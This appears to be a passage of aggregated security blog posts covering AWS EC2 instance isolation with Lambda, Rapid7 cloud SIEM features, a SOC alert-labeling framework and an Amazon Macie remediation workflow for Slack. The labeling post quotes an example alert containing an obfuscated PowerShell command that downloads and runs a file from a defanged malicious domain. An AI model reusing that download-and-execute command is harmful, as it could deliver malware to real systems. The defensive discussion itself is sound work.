  • Enable traceability: Monitor, alert, and audit actions and changes to your environment in real time. Integrate log and metric collection with systems to automatically investigate and take action.
  • Automate security best practices: Automated software-based security mechanisms can improve your ability to securely scale more rapidly and cost-effectively. Create secure architectures, including through the implementation of controls that can be defined and managed by AWS as code in version-controlled templates.
  • Prepare for security events: Prepare for an incident by implementing incident management and investigation policy and processes that align to your organizational requirements. Run incident response simulations and use tools with automation to help increase your speed for detection, investigation, and recovery.

After detecting an event in the Detection phase and analyzing in the Analysis phase, you can automate the process of logically isolating an instance from a Virtual Private Cloud (VPC) in Amazon Web Services (AWS).

In this blog post, I describe how to automate EC2 instance isolation by using the tagging feature that a responder can use to identify instances that need to be isolated. A Lambda function then uses AWS API calls to isolate the instances by performing the actions described in the following sections.

Use cases

Your organization can use automated EC2 instance isolation for scenarios like these:

  • A security analyst wants to automate EC2 instance isolation in order to respond to security events in a timely manner.
  • A security manager wants to provide their first responders with a way to quickly react to security incidents without providing too much access to higher security features.

High-level architecture and design

The example solution in this blog post uses a CloudWatch Events rule to trigger a Lambda function. The CloudWatch Events rule is triggered when a tag is applied to an EC2 instance. The Lambda code triggers further actions based on the contents of the event. Note that the CloudFormation template includes the appropriate permissions to run the function.

The event flow is shown in Figure 1 and works as follows:

  1. The EC2 instance is tagged.
  2. The CloudWatch Events rule filters the event.
  3. The Lambda function is invoked.
  4. If the criteria are met, the isolation workflow begins.

When the Lambda function is invoked and the criteria are met, these actions are performed:

  1. Checks for IAM instance profile associations.
  2. If the instance is associated to a role, the Lambda function disassociates that role.
  3. Applies the isolation role that you defined during CloudFormation stack creation.
  4. Checks the VPC where the EC2 instance resides.
    • If there is no isolation security group in the VPC (if the VPC is new, for example), the function creates one.
  5. Applies the isolation security group.

Note: If you had a security group with an open (0.0.0.0/0) outbound rule, and you apply this Isolation security group, your existing SSH connections to the instance are immediately dropped. On the other hand, if you have a narrower inbound rule that initially allows the SSH connection, the existing connection will not be broken by changing the group. This is known as Connection Tracking.

Figure 1: High-level diagram showing event flow

Figure 1: High-level diagram showing event flow

For the deployment method, we will be using an AWS CloudFormation Template. AWS CloudFormation gives you an easy way to model a collection of related AWS and third-party resources, provision them quickly and consistently, and manage them throughout their lifecycles, by treating infrastructure as code.

The AWS CloudFormation template that I provide here deploys the following resources:

  • An EC2 instance role for isolation – this is attached to the EC2 Instance to prevent further communication with other AWS Services thus limiting the attack surface to your overall infrastructure.
  • An Amazon CloudWatch Events rule – this is used to detect changes to an AWS EC2 resource, in this case a “tag change event”. We will use this as a trigger to our Lambda function.
  • An AWS Identity and Access Management (IAM) role for Lambda functions – this is what the Lambda function will use to execute the workflow.
  • A Lambda function for automation – this function is where all the decision logic sits, once triggered it will follow a set of steps described in the following section.
  • Lambda function permissions – this is used by the Lambda function to execute.
  • An IAM instance profile – this is a container for an IAM role that you can use to pass role information to an EC2 instance.

Supporting functions within the Lambda function

Let’s dive deeper into each supporting function inside the Lambda code.

The following function identifies the virtual private cloud (VPC) ID for a given instance. This is needed to identify which security groups are present in the VPC.

def identifyInstanceVpcId(instanceId):
    instanceReservations = ec2Client.describe_instances(InstanceIds=[instanceId])['Reservations']
    for instanceReservation in instanceReservations:
        instancesDescription = instanceReservation['Instances']
        for instance in instancesDescription:
            return instance['VpcId']

The following function modifies the security group of an EC2 instance.

def modifyInstanceAttribute(instanceId,securityGroupId):
    response = ec2Client.modify_instance_attribute(
        Groups=[securityGroupId],
        InstanceId=instanceId)

The following function creates a security group on a VPC that blocks all egress access to the security group.

def createSecurityGroup(groupName, descriptionString, vpcId):
    resource = boto3.resource('ec2')
    securityGroupId = resource.create_security_group(GroupName=groupName, Description=descriptionString, VpcId=vpcId)
    securityGroupId.revoke_egress(IpPermissions= [{'IpProtocol': '-1','IpRanges': [{'CidrIp': '0.0.0.0/0'}],'Ipv6Ranges': [],'PrefixListIds': [],'UserIdGroupPairs': []}])
    return securityGroupId.

Deploy the solution

To deploy the solution provided in this blog post, first download the CloudFormation template, and then set up a CloudFormation stack that specifies the tags that are used to trigger the automated process.

Download the CloudFormation template

To get started, download the CloudFormation template from Amazon S3. Alternatively, you can launch the CloudFormation template by selecting the following Launch Stack button:

Select the Launch Stack button to launch the template

Deploy the CloudFormation stack

Start by uploading the CloudFormation template to your AWS account.

To upload the template

  1. From the AWS Management Console, open the CloudFormation console.
  2. Choose Create Stack.
  3. Choose With new resources (standard).
  4. Choose Upload a template file.
  5. Select Choose File, and then select the YAML file that you just downloaded.
Figure 2: CloudFormation stack creation

Figure 2: CloudFormation stack creation

Specify stack details

You can leave the default values for the stack as long as there aren’t any resources provisioned already with the same name, such as an IAM role. For example, if left with default values an IAM role named “SecurityIsolation-IAMRole” will be created. Otherwise, the naming convention is fully customizable from this screen and you can enter your choice of name for the CloudFormation stack, and modify the parameters as you see fit. Figure 3 shows the parameters that you can set.

The Evaluation Parameters section defines the tag key and value that will initiate the automated response. Keep in mind that these values are case-sensitive.

Figure 3: CloudFormation stack parameters

Figure 3: CloudFormation stack parameters

Choose Next until you reach the final screen, shown in Figure 4, where you acknowledge that an IAM role is created and you trust the source of this template. Select the check box next to the statement I acknowledge that AWS CloudFormation might create IAM resources with custom names, and then choose Create Stack.

Figure 4: CloudFormation IAM notification

Figure 4: CloudFormation IAM notification

After you complete these steps, the following resources will be provisioned, as shown in Figure 5:

  • EC2IsolationRole
  • EC2TagChangeEvent
  • IAMRoleForLambdaFunction
  • IsolationLambdaFunction
  • IsolationLambdaFunctionInvokePermissions
  • RootInstanceProfile
Figure 5: CloudFormation created resources

Figure 5: CloudFormation created resources

Testing

To start your automation, tag an EC2 instance using the tag defined during the CloudFormation setup. If you’re using the Amazon EC2 console, you can apply tags to resources by using the Tags tab on the relevant resource screen, or you can use the Tags screen, the AWS CLI or an AWS SDK. A detailed walkthrough for each approach can be found in the Amazon EC2 Documentation page.

Reverting Changes

If you need to remove the restrictions applied by this workflow, complete the following steps.

  1. From the EC2 dashboard, in the Instances section, check the box next to the instance you want to modify.

    Figure 6: Select the instance to modify

    Figure 6: Select the instance to modify

  2. In the top right, select Actions, choose Instance settings, and then choose Modify IAM role.

    Figure 7: Choose Actions > Instance settings > Modify IAM role

    Figure 7: Choose Actions > Instance settings > Modify IAM role

  3. Under IAM role, choose the IAM role to attach to your instance, and then select Save.

    Figure 8: Choose the IAM role to attach

    Figure 8: Choose the IAM role to attach

  4. Select Actions, choose Networking, and then choose Change security groups.

    Figure 9: Choose Actions > Networking > Change security groups

    Figure 9: Choose Actions > Networking > Change security groups

  5. Under Associated security groups, select Remove and add a different security group with the access you want to grant to this instance.

Summary

Using the CloudFormation template provided in this blog post, a Security Operations Center analyst could have only tagging privileges and isolate an EC2 instance based on this tag. Or a security service such as Amazon GuardDuty could trigger a lambda to apply the tag as part of a workflow. This means the Security Operations Center analyst wouldn’t need administrative privileges over the EC2 service.

This solution creates an isolation security group for any new VPCs that don’t have one already. The security group would still follow the naming convention defined during the CloudFormation stack launch, but won’t be part of the provisioned resources. If you decide to delete the stack, manual cleanup would be required to remove these security groups.

This solution terminates established inbound Secure Shell (SSH) sessions that are associated to the instance, and isolates the instance from new connections either inbound or outbound. For outbound connections that are already established (for example, reverse shell), you either need to shut down the network interface card (NIC) at the operating system (OS) level, restart the instance network stack at the OS level, terminate the established connections, or apply a network access control list (network ACL).

For more information, see the following documentation:

If you have feedback about this post, submit comments in the Comments section below.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Jose Obando

Jose is a Security Consultant on the Global Financial Services team. He helps the world’s top financial institutions improve their security posture in the cloud. He has a background in network security and cloud architecture. In his free time, you can find him playing guitar or training in Muay Thai.

How to Combat Alert Fatigue With Cloud-Based SIEM Tools

Post Syndicated from Margaret Zonay original https://blog.rapid7.com/2021/02/22/how-to-combat-alert-fatigue-with-cloud-based-siem-tools/

How to Combat Alert Fatigue With Cloud-Based SIEM Tools

Today’s security teams are facing more complexity than ever before. IT environments are changing and expanding rapidly, resulting in proliferating data as organizations adopt more tools to stay on top of their sprawling environments. And with an abundance of tools comes an abundance of alerts, leading to the inevitable alert fatigue for security operations teams. Research completed by Enterprise Strategy Group determined 40% of organizations use 10 to 25 separate security tools, and 30% use 26 to 50. That means thousands (or tens of thousands!) of alerts daily, depending on the organization’s size.

Fortunately, there’s a way to get the visibility your team needs and streamline alerts: leveraging a cloud-based SIEM. Here are a few key ways a cloud-based SIEM can help combat alert fatigue to accelerate threat detection and response.

Access all of your critical security data in one place

Traditional SIEMs focus primarily on log management and are centered around compliance instead of giving you a full picture of your network. The rigidity of these outdated solutions is the opposite of what today’s agile teams need. A cloud SIEM can unify diverse data sets across on-premises, remote, and cloud environments, to provide security operations teams with the holistic visibility they need in one place, eliminating the need to jump in and out of multiple tools (and the thousands of alerts that they produce).

With modern cloud SIEMs like Rapid7’s InsightIDR, you can collect more than just logs from across your environment and ingest data including user activity, cloud, endpoints, and network traffic—all into a single solution. With your data in one place, cloud SIEMs deliver meaningful context and prioritization to help you avoid an abundance of alerts.

Cut through the noise to detect attacks early in the attack chain

By analyzing all of your data together, a cloud SIEM uses machine learning to better recognize patterns in your environment to understand what’s normal and what’s a potential threat. The result? More fine-tuned detections so your team is only alerted when there are real signs of a threat.

Instead of bogging you down with false positives, cloud SIEMs provide contextual, actionable alerts. InsightIDR offers customers high-quality, out-of-the-box alerts created and curated by our expert analysts based on real threats—so you can stop attacks early in the attack chain instead of sifting through a mountain of data and worthless alerts.

Accelerate response with automation

With automation, you can reduce alert fatigue and further improve your SOC’s efficiency. By leveraging a cloud SIEM that has built-in automation, or has the ability to integrate with a security orchestration and automation (SOAR) tool, your SOC can offload a significant amount of their workload and free up analysts to focus on what matters most, all while still improving security posture.

A cloud SIEM with expert-driven detections and built-in automation enables security teams to respond to and remediate attacks in a fraction of the time, instead of manually investigating thousands of alerts. InsightIDR integrates seamlessly with InsightConnect, Rapid7’s security orchestration and automation response (SOAR) tool, to reduce alert fatigue, automate containment, and improve investigation handling.

With holistic network visibility and advanced analysis, cloud-based SIEM tools provide teams with high context alerts and correlation to fight alert fatigue and accelerate incident detection and response. Learn more about how InsightIDR can help eliminate alert fatigue and more by checking out our outcomes pages.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Monitor Google Cloud Platform (GCP) Data With InsightIDR

Post Syndicated from Margaret Zonay original https://blog.rapid7.com/2021/02/16/monitor-google-cloud-platform-gcp-data-with-insightidr/

Monitor Google Cloud Platform (GCP) Data With InsightIDR

InsightIDR was built in the cloud to support dynamic and rapidly changing environments—including remote workers, hybrid cloud and on-premises architectures, and fully cloud environments. Today, more and more organizations are adopting multi-cloud or hybrid environments, creating increasingly more dispersed security environments. According to the 2020 IDG Cloud Computing Survey, 92% of organization’s IT environments are at least somewhat cloud today, and more than half use multiple public clouds.

Google Cloud Platform (GCP) is one of the top cloud providers in 2021, and is trusted by leading companies across industries to help monitor their multi-cloud or hybrid environments. With a wide reach—GCP is available in over 200 countries and territories—it’s no wonder why.

To further provide support and monitoring capabilities for our customers, we recently added Google Cloud Platform (GCP) as an event source in InsightIDR. With this new integration, you’ll be able to collect user ingress events, administrative activity, and log data generated by GCP to monitor running instances and account activity within InsightIDR. You can also send firewall events to generate firewall alerts in InsightIDR, and threat detection logs to generate third-party alerts.

This new integration allows you to collect GCP data alongside your other security data in InsightIDR for expert alerting and more streamlined analysis of data across your environment.

Find Google Cloud threats fast with InsightIDR

Once you add GCP support, InsightIDR will be able to see users logging in to Google Cloud as ingress events as if they were connecting to the corporate network via VPN, allowing teams to:

  • Detect when ingress activity is coming from an untrusted source, such as a threat IP or an unusual foreign country.
  • Detect when users are logging into your corporate network and/or your Google Cloud environment from multiple countries at the same time, which should be impossible and is an indicator of a compromised account.
  • Detect when a user that has been disabled in your corporate network successfully authenticates to your Google Cloud environment, which may indicate a terminated employee has not had their access revoked from GCP and is now connected to the GCP environment.

For details on how to configure and leverage the GCP event source, check out our help docs.

Looking for more cloud coverage? Learn how InsightIDR covers both Azure and AWS cloud environments.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Talkin’ SMAC: Alert Labeling and Why It Matters

Post Syndicated from matthew berninger original https://blog.rapid7.com/2021/02/12/talkin-smac-alert-labeling-and-why-it-matters/

Talkin’ SMAC: Alert Labeling and Why It Matters

If you’ve ever worked in a Security Operations Center (SOC), you know that it’s a special place. Among other things, the SOC is a massive data-labeling machine, and generates some of the most valuable data in the cybersecurity industry. Unfortunately, much of this valuable data is often rendered useless because the way we label data in the SOC matters greatly. Sometimes decisions made with good intentions to save time or effort can inadvertently result in the loss or corruption of data.

Thoughtful measures must be taken ahead of time to ensure that the hard work SOC analysts apply to alerts results in meaningful, usable datasets. If properly recorded and handled, this data can be used to dramatically improve SOC operations. This blog post will demonstrate some common pitfalls of alert labeling, and will offer a new framework for SOCs to use—one that creates better insight into operations and enables future automation initiatives.

First, let’s define the scope of “SOC operations” for this discussion. All SOCs are different, and many do much more than alert triage, but for the purposes of this blog, let’s assume that a “typical SOC” ingests cybersecurity data in the form of alerts or logs (or both), analyzes them, and outputs reports and action items to stakeholders. Most importantly, the SOC decides which alerts don’t represent malicious activity, which do, and, if so, what to do about them. In this way, the SOC can be thought of as applying “labels” to the cybersecurity data that it analyzes.

There are at least three main groups that care about what the SOC is doing:

  1. SOC leadership/management
  2. Customers/stakeholders
  3. Intel/detection/research

These groups have different and sometimes overlapping questions about each alert. We will try to categorize these questions below into what we are now calling the Status, Malice, Action, Context (SMAC) model.

  • Status: SOC leaders and MDR/MSSP management typically want to know: Is this alert open? Is anyone looking at it? When was it closed? How long did it take?
  • Malice: Detection and threat intel teams want to know whether signatures are doing a good job separating good from bad. Did this alert find something malicious, or did it accidentally find something benign?
  • Action: Customers and stakeholders want to know if they have a problem, what it is, and what to do about it.Context: Stakeholders, intelligence analysts, and researchers want to know more about the alert. Was it a red team? Was it internal testing? Was it the malware tied to advanced persistent threat (APT) actors, or was it a “commodity” threat? Was the activity sinkholed or blocked?
Talkin’ SMAC: Alert Labeling and Why It Matters

What do these dropdowns all have in common? They are all trying to answer at least two—sometimes three or four—questions with only one drop down menu. Menu 1 has labels that indicate Status and Malice. Menu 2 covers Status, Malice, and Context. Menu 3 is trying to answer all four categories at once.

I have seen and used other interfaces in which “Status” labels are broken out into a separate dropdown, and while this is good, not separating the remaining categories—Malice, Action, or Context—still creates confusion.

I have also seen other interfaces like Menu 3, with dozens of choices available for seemingly every possible scenario. However, this does not allow for meaningful enforcement of different labels for different questions, and again creates confusion and noise.

What do I mean by confusion? Let’s walk through an example.

Malicious or Benign?

Here is a hypothetical windows process start alert:

Parent Process: WINWORD.EXE

Process: CMD.EXE

Process Arguments: 'pow^eRSheLL^.eX^e ^-e^x^ec^u^tI^o^nP^OLIcY^ ByP^a^S^s -nOProf^I^L^e^ -^WIndoWST^YLe H^i^D^de^N ^(ne^w-O^BJe^c^T ^SY^STeM. Ne^T^.^w^eB^cLie^n^T^).^Do^W^nlo^aDfi^Le(^’http:// www[.]badsite[.]top/user.php?f=1.dat’,^’%USERAPPDATA%. eXe’);s^T^ar^T-^PRO^ce^s^S^ ^%USERAPPDATA%.exe'

In this example,  let’s say the above details are the entirety of the alert artifact. Based solely on this information, an analyst would probably determine that this alert represents malicious activity. There is no clear legitimate reason for a user to perform this action in this way and, in fact, this syntax matches known malicious examples. So it should be labeled Malicious, right?

What if it’s not a threat?

However, what if upon review of related network logs around the time of this execution, we found out that the connection to the www[.]badsite[.]com command and control (C2) domain was sinkholed? Would this alert now be labeled Benign or Malicious? Well, that depends who’s asking.

The artifact, as shown above, is indeed inherently malicious. The PowerShell command intends to download and execute a file within the %USERAPPDATA% directory, and has taken steps to hide its purpose by using PowerShell obfuscation characters. Moreover, PowerShell was spawned by WINWORD.EXE, which is something that isn’t usually legitimate. Last, this behavior matches other publicly documented examples of malicious activity.

Though we may have discovered the malicious callback was sinkholed, nothing in the alert artifact gives any indication that the attack was not successful. The fact that it was sinkholed is completely separate information, acquired from other, related artifacts. So from a detection or research perspective, this alert, on its own, is 100% malicious.

However, if you are the stakeholder or customer trying to manage a daily flood of escalations, tickets, and patching, the circumstantial information that it was sinkholed is very important. This is not a threat you need to worry about. If you get a report about some commodity attack that was sinkholed, that may be a waste of your time. For example, you may have internal workflows that automatically kick off when you receive a Malicious report, and you don’t want all that hassle for something that isn’t an urgent problem. So, from your perspective, given the choice between only Malicious or Benign, you may want this to be called Benign.

Downstream effects

Now, let’s say we only had one level of labeling and we marked the above alert Benign, since the connection to the C2 was sinkholed. Over time, analysts decide to adopt this as policy: mark as Benign any alert that doesn’t present an actual threat, even if it is inherently malicious. We may decide to still submit an “informational” report to let them know, but we don’t want to hassle customers with a bunch of false alarms, so they can focus on the real threats.

Talkin’ SMAC: Alert Labeling and Why It Matters

A year later, management decides to automate the analysis of these alerts entirely, so we have our data scientists train a model on the last year of labeled process-based artifacts. For some reason, the whiz-bang data science model routinely misses obfuscated PowerShell attacks! The reason, of course, is that the model saw a bunch of these marked “Benign” in the learning process, and has determined that obfuscated PowerShell syntax reaching out to suspicious domains like the above is perfectly fine and not something to worry about. After all, we have been teaching it that with our “Benign” designation, time and time again.

Our model’s false negative rate is through the roof. “Surely we can go back and find and re-label those,” we decide. “That will fix it!.” Perhaps we can, but doing so requires us to perform the exact same work we already did over the past year. By limiting our labels to only one level of labeling, we have corrupted months of expensive expert analysis and rendered it useless. In order to fix it so we can automate our work, we have to now do even more work. And indeed, without separated labeling categories, we can fall into this same trap in other ways—even with the best intentions.

The playbook pitfall

Let’s say you are trying to improve efficiency in the SOC (and who isn’t, right?!). You identify that analysts spend a lot of time clicking buttons and copying alert text to write reports. So, after many months of development, you unveil the wonderful new Automated Response Reporting Workflow, which of course you have internally dubbed “Project ARRoW.” As soon as an analyst marks an alert as ‘Malicious’, a draft report is auto-generated with information from the alert and some boilerplate recommendations. All the analyst has to do is click “publish,” and poof—off it goes to the stakeholder! Analysts love it. Project ARRoW is a huge success.

However, after a month or so, some of your stakeholders say they don’t want any more Potentially Unwanted Program (PUP) reports. They are using some of the slick Application Programming Interface (API) integrations of your reporting portal, and every time you publish a report, it creates a ticket and a ton of work on their end. “Stop sending us these PUP reports!” they beg. So, of course you agree to stop—but the problem is that with ARRoW, if you mark an alert Malicious, a report is automatically generated, so you have to mark them Benign to avoid that. Except they’re not Benign.

Now your PUP signatures look bad even though they aren’t! Your PUP classification model, intended to automatically separate true PUP alerts from False Positives, is now missing actual Malicious activity (which, remember, all your other customers still want to know about) because it has been trained on bad labels. All this because you wanted to streamline reporting! Before you know it, you are writing individual development tickets to add customer-specific expectations to ARRoW. You even build a “Customer Exception Dashboard” to keep track of them all. But you’re only digging yourself deeper.

Talkin’ SMAC: Alert Labeling and Why It Matters

Applying multiple labels

The solution to this problem is to answer separate questions with separate answers. Applying a single label to an alert is insufficient to answer the multiple questions SOC stakeholders want to know:

  1. Has it been reviewed? (Status)
  2. Is it indicative of malicious activity? (Malice)
  3. Do I need to do something? (Action)
  4. What else do we know about the alert? (Context)

These questions should be answered separately in different categories, and that separation must be enforced. Some categories can be open-ended, while others must remain limited multiple choice.

Let me explain:

Status: The choices here should include default options like OPEN, CLOSED, REPORTED, ESCALATED, etc. but there should be an ability to add new status labels depending on an organization’s workflow. This power should probably be held by management, to ensure new labels are in line with desired workflows and metrics. Setting a label here should be mandatory to move forward with alert analysis.

Malice: This category is arguably the most important one, and should ideally be limited to two options total: Malicious or Benign. To clarify, I use Benign here to denote an activity that reflects normal usage of computing resources, but not for usage that is otherwise malicious in nature but has been mitigated or blocked. Moreover, Benign does not apply to activities that are intended to imitate malicious behavior, such as red teaming or testing. Put most simply, “Benign” activities are those that reflect normal user and administrative usage.

Note: If an org chooses to include a third label such as “Suspicious,” rest assured that this label will eventually be abused, perhaps in situations of circumstantial ambiguity, or as a placeholder for custom workflows. Adding any choices beyond Malicious or Benign will add noise to this dataset and reduce its usefulness. And take note—this reduction in utility is not linear. Even at very low levels of noise, the dataset will become functionally worthless. Properly implemented, analysts must choose between only Malicious or Benign, and entering a label here should be mandatory to move forward. If caveats apply, they can be added in a comments section, but all measures should be taken before polluting the label space.

Action: This is where you can record information that answers the question “Should I do something about this?” This can include options like “Active Compromise,” “Ignore,” “Informational,” “Quarantined,” or “Sinkholed.” Managers and administrators can add labels here as needed, and choosing a label should be mandatory to move forward. These labels need not be mutually exclusive, meaning you can choose more than one.

Context: This category can be used as a catch-all to record any information that you haven’t already captured, such as attribution, suspected malware family, whether or not it was testing or a red-team, etc. This is often also referred to as “tagging.” This category should be the most open to adding new labels, with some care taken to normalize labels so as to avoid things like ‘APT29’ vs. ‘apt29’, etc. This category need not be mandatory, and the labels should not be mutually exclusive.

Note: Because the Context category is the most flexible, there are potentials for abuse here. SOC leadership should regularly audit newly created Context labels and ensure workarounds are not being built to circumvent meaningful labeling in the previous categories.

Garbage in, garbage out

Supervised SOC models are like new analysts—they will “learn” from what other analysts have historically done. In a very simplified sense, when a model is “trained” on alert data, it looks at each alert, looks at the corresponding label, and tries to draw connections as to why that label was applied. However, unlike human analysts, supervised SOC models can’t ask follow-on contextual questions like, “Hey, why did you mark this as Benign?” or “Why are some of these marked ‘Red Team’ and others are marked ‘Testing?’” The machine learning (ML) model can only learn from the labels it is given. Talkin’ SMAC: Alert Labeling and Why It MattersIf the labels are wrong, the model will be wrong. Therefore, taking time to really think through how and why we label our data a certain way can have ramifications months and years later. If we label alerts properly, we can measure—and therefore improve—our operations, threat intel, and customer impact more successfully.

I also recognize that anyone in user interface (UI) design may be cringing at this idea. More buttons and more clicks in an already busy interface? Indeed, I have had these conversations when trying to implement systems like this. However, the long-term benefits of having statistically meaningful data outweighs the cost of adding another label or three. Separating categories in this way also makes the alerting workflow a much richer target for automated rules engines and automations. Because of the multiple categories, automatic alert-handling rules need not be all-or-nothing, but can be more specifically tailored to more complex combinations of labels.

Why should we care about this?

Imagine a world when SOC analysts don’t have to waste time reviewing obvious false positives, or repetitive commodity malware. Imagine a world where SOC analysts only tackle the interesting questions—new types of evil, targeted activity, and active compromises.

Imagine a world where stakeholders get more timely and actionable alerts, rather than monthly rollups and the occasional after-action report when alerts are missed due to capacity issues.

Imagine centralized ML models learning directly from labels applied in customer SOCs. Knowledge about malicious behavior detected in one customer environment could instantaneously improve alert classification models for all customers.

SOC analysts with time to do deeper investigations, more hunting, and more training to keep up with new threats. Stakeholders with more value and less noise. Threat information instantaneously incorporated into real-time ML detection models. How do we get there?

The first step is building meaningful, useful alert datasets. Using a labeling scheme like the one described above will help improve fidelity and integrity in SOC alert labels, and pave the way for these innovations.

Talkin’ SMAC: Alert Labeling and Why It Matters

Deploy an automated ChatOps solution for remediating Amazon Macie findings

Post Syndicated from Nick Cuneo original https://aws.amazon.com/blogs/security/deploy-an-automated-chatops-solution-for-remediating-amazon-macie-findings/

The amount of data being collected, stored, and processed by Amazon Web Services (AWS) customers is growing at an exponential rate. In order to keep pace with this growth, customers are turning to scalable cloud storage services like Amazon Simple Storage Service (Amazon S3) to build data lakes at the petabyte scale. Customers are looking for new, automated, and scalable ways to address their data security and compliance requirements, including the need to identify and protect their sensitive data. Amazon Macie helps customers address this need by offering a managed data security and data privacy service that uses machine learning and pattern matching to discover and protect your sensitive data that is stored in Amazon S3.

In this blog post, I show you how to deploy a solution that establishes an automated event-driven workflow for notification and remediation of sensitive data findings from Macie. Administrators can review and approve remediation of findings through a ChatOps-style integration with Slack. Slack is a business communication tool that provides messaging functionality, including persistent chat rooms known as channels. With this solution, you can streamline the notification, investigation, and remediation of sensitive data findings in your AWS environment.

Prerequisites

Before you deploy the solution, make sure that your environment is set up with the following prerequisites:

Important: This solution uses various AWS services, and there are costs associated with these resources after the Free Tier usage. See the AWS pricing page for details.

Solution overview

The solution architecture and workflow are detailed in Figure 1.

Figure 1: Solution overview

Figure 1: Solution overview

This solution allows for the configuration of auto-remediation behavior based on finding type and finding severity. For each finding type, you can define whether you want the offending S3 object to be automatically quarantined, or whether you want the finding details to be reviewed and approved by a human in Slack prior to being quarantined. In a similar manner, you can define the minimum severity level (Low, Medium, High) that a finding must have before the solution will take action. By adjusting these parameters, you can manage false positives and tune the volume and type of findings about which you want to be notified and take action. This configurability is important because customers have different security, risk, and regulatory requirements.

Figure 1 details the services used in the solution and the integration points between them. Let’s walk through the full sequence from the detection of sensitive data to the remediation (quarantine) of the offending object.

  1. Macie is configured with sensitive data discovery jobs (scheduled or one-time), which you create and run to detect sensitive data within S3 buckets. When Macie runs a job, it uses a combination of criteria and techniques to analyze objects in S3 buckets that you specify. For a full list of the categories of sensitive data Macie can detect, see the Amazon Macie User Guide.
  2. For each sensitive data finding, an event is sent to Amazon EventBridge that contains the finding details. An EventBridge rule triggers a Lambda function for processing.
  3. The Finding Handler Lambda function parses the event and examines the type of the finding. Based on the auto-remediation configuration, the function either invokes the Finding Remediator function for immediate remediation, or sends the finding details for manual review and remediation approval through Slack.
  4. Delegated security and compliance administrators monitor the configured Slack channel for notifications. Notifications provide high-level finding information, remediation status, and a link to the Macie console for the finding in question. For findings configured for manual review, administrators can choose to approve the remediation in Slack by using an action button on the notification.
  5. After an administrator chooses the Remediate button, Slack issues an API call to an Amazon API Gateway endpoint, supplying both the unique identifier of the finding to be remediated and that of the Slack user. API Gateway proxies the request to a Remediation Handler Lambda function.
  6. The Remediation Handler Lambda function validates the request and request signature, extracts the offending object’s location from the finding, and makes an asynchronous call to the Finding Remediator Lambda function.
  7. The Finding Remediator Lambda function moves the offending object from the source bucket to a designated S3 quarantine bucket with restricted access.
  8. Finally, the Finding Remediator Lambda function uses a callback URL to update the original finding notification in Slack, indicating that the offending object has now been quarantined.

Deploy the solution

Now we’ll walk through the steps for configuring Slack and deploying the solution into your AWS environment by using the AWS CDK. The AWS CDK is a software development framework that you can use to define cloud infrastructure in code and provision through AWS CloudFormation.

The deployment steps can be summarized as follows:

  1. Configure a Slack channel and app
  2. Check the project out from GitHub
  3. Set the configuration parameters
  4. Build and deploy the solution
  5. Configure Slack with an API Gateway endpoint

To configure a Slack channel and app

  1. In your browser, make sure you’re logged into the Slack workspace where you want to integrate the solution.
  2. Create a new channel where you will send the notifications, as follows:
    1. Choose the + icon next to the Channels menu, and select Create a channel.
    2. Give your channel a name, for example macie-findings, and make sure you turn on the Make private setting.

      Important: By providing Slack users with access to this configured channel, you’re providing implicit access to review Macie finding details and approve remediations. To avoid unwanted user access, it’s strongly recommended that you make this channel private and by invite only.

  3. On your Apps page, create a new app by selecting Create New App, and then enter the following information:
    1. For App Name, enter a name of your choosing, for example MacieRemediator.
    2. Select your chosen development Slack workspace that you logged into in step 1.
    3. Choose Create App.
    Figure 2: Create a Slack app

    Figure 2: Create a Slack app

  4. You will then see the Basic Information page for your app. Scroll down to the App Credentials section, and note down the Signing Secret. This secret will be used by the Lambda function that handles all remediation requests from Slack. The function uses the secret with Hash-based Message Authentication Code (HMAC) authentication to validate that requests to the solution are legitimate and originated from your trusted Slack channel.

    Figure 3: Signing secret

    Figure 3: Signing secret

  5. Scroll back to the top of the Basic Information page, and under Add features and functionality, select the Incoming Webhooks tile. Turn on the Activate Incoming Webhooks setting.
  6. At the bottom of the page, choose Add New Webhook to Workspace.
    1. Select the macie-findings channel you created in step 2, and choose Allow.
    2. You should now see webhook URL details under Webhook URLs for Your Workspace. Use the Copy button to note down the URL, which you will need later.

      Figure 4: Webhook URL

      Figure 4: Webhook URL

To check the project out from GitHub

The solution source is available on GitHub in AWS Samples. Clone the project to your local machine or download and extract the available zip file.

To set the configuration parameters

In the root directory of the project you’ve just cloned, there’s a file named cdk.json. This file contains configuration parameters to allow integration with the macie-findings channel you created earlier, and also to allow you to control the auto-remediation behavior of the solution. Open this file and make sure that you review and update the following parameters:

  • autoRemediateConfig – This nested attribute allows you to specify for each sensitive data finding type whether you want to automatically remediate and quarantine the offending object, or first send the finding to Slack for human review and authorization. Note that you will still be notified through Slack that auto-remediation has taken place if this attribute is set to AUTO. Valid values are either AUTO or REVIEW. You can use the default values.
  • minSeverityLevel – Macie assigns all findings a Severity level. With this parameter, you can define a minimum severity level that must be met before the solution will trigger action. For example, if the parameter is set to MEDIUM, the solution won’t take any action or send any notifications when a finding has a LOW severity, but will take action when a finding is classified as MEDIUM or HIGH. Valid values are: LOW, MEDIUM, and HIGH. The default value is set to LOW.
  • slackChannel – The name of the Slack channel you created earlier (macie-findings).
  • slackWebHookUrl – For this parameter, enter the webhook URL that you noted down during Slack app setup in the “Configure a Slack channel and app” step.
  • slackSigningSecret – For this parameter, enter the signing secret that you noted down during Slack app setup.

Save your changes to the configuration file.

To build and deploy the solution

  1. From the command line, make sure that your current working directory is the root directory of the project that you cloned earlier. Run the following commands:
    • npm install – Installs all Node.js dependencies.
    • npm run build – Compiles the CDK TypeScript source.
    • cdk bootstrap – Initializes the CDK environment in your AWS account and Region, as shown in Figure 5.

      Figure 5: CDK bootstrap output

      Figure 5: CDK bootstrap output

    • cdk deploy – Generates a CloudFormation template and deploys the solution resources.

    The resources created can be reviewed in the CloudFormation console and can be summarized as follows:

    • Lambda functions – Finding Handler, Remediation Handler, and Remediator
    • IAM execution roles and associated policy – The roles and policy associated with each Lambda function and the API Gateway
    • S3 bucket – The quarantine S3 bucket
    • EventBridge rule – The rule that triggers the Lambda function for Macie sensitive data findings
    • API Gateway – A single remediation API with proxy integration to the Lambda handler
  2. After you run the deploy command, you’ll be prompted to review the IAM resources deployed as part of the solution. Press y to continue.
  3. Once the deployment is complete, you’ll be presented with an output parameter, shown in Figure 6, which is the endpoint for the API Gateway that was deployed as part of the solution. Copy this URL.

    Figure 6: CDK deploy output

    Figure 6: CDK deploy output

To configure Slack with the API Gateway endpoint

